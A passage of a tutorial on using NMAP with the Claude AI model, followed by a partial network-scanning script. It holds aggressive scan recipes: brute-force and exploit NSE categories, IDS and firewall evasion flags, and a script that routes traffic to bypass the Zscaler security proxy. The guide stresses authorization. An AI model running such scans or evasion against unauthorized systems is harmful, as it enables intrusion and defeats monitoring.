nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor and Unusual Port Detection
nmap --script unusual-port,"*backdoor*" -T4 secure-server.example-target.com

# Phase 5: Authentication Testing (auth and brute are NSE script categories)
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Note that -oA writes the normal, XML, and grepable formats; the "script kiddie" output requires a separate -oS flag. Claude can then help you parse the XML file programmatically.
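
For instance, here is a minimal sketch that pulls the open ports out of the XML output using Python's standard library (assuming the scan_results prefix from the command above):

import xml.etree.ElementTree as ET

# scan_results.xml is produced by the -oA prefix above
for host in ET.parse('scan_results.xml').getroot().iter('host'):
    addr = host.find('address').get('addr')
    for port in host.iter('port'):
        if port.find('state').get('state') == 'open':
            svc = port.find('service')
            name = svc.get('name') if svc is not None else 'unknown'
            print(f"{addr} {port.get('protocol')}/{port.get('portid')} {name}")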

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
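
One way to implement the comparison step is to diff the sets of open ports between a baseline scan and the latest one. Below is a minimal sketch, assuming weekly XML outputs named baseline.xml and latest.xml (produced with -oX or -oA); nmap also ships an ndiff utility that does much the same thing:

import xml.etree.ElementTree as ET

def open_ports(path):
    """Collect (address, protocol, port) tuples for every open port in an nmap XML file."""
    found = set()
    for host in ET.parse(path).getroot().iter('host'):
        addr = host.find('address').get('addr')
        for port in host.iter('port'):
            if port.find('state').get('state') == 'open':
                found.add((addr, port.get('protocol'), port.get('portid')))
    return found

baseline, latest = open_ports('baseline.xml'), open_ports('latest.xml')
print("New since baseline:   ", sorted(latest - baseline))
print("Closed since baseline:", sorted(baseline - latest))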

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0


MacBook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive reconnaissance and vulnerability assessment script with API testing and detailed reporting; it scans and probes but does not exploit.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan Type               Duration
Basic                   2-5 min
With subdomains         +1-2 min per subdomain
With vulnerabilities    +10-20 min
Full scan               15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs reconnaissance and non-intrusive scanning only:

  • ✅ DNS queries, certificate transparency lookups, public web requests, port/service probing
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    cat << EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    > "$EXEC_REPORT"
    > "$TECH_REPORT"
    > "$VULN_REPORT"
    > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    # grep -c already prints 0 when there is no match; the default only guards a missing file
    TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt 2>/dev/null); TLS_12=${TLS_12:-0}
    TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt 2>/dev/null); TLS_13=${TLS_13:-0}
    TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt 2>/dev/null); TLS_10=${TLS_10:-0}
    TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt 2>/dev/null); TLS_11=${TLS_11:-0}
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt 2>/dev/null); OPEN_PORTS=${OPEN_PORTS:-0}
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || true)   # grep -c prints 0 itself on no matches
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
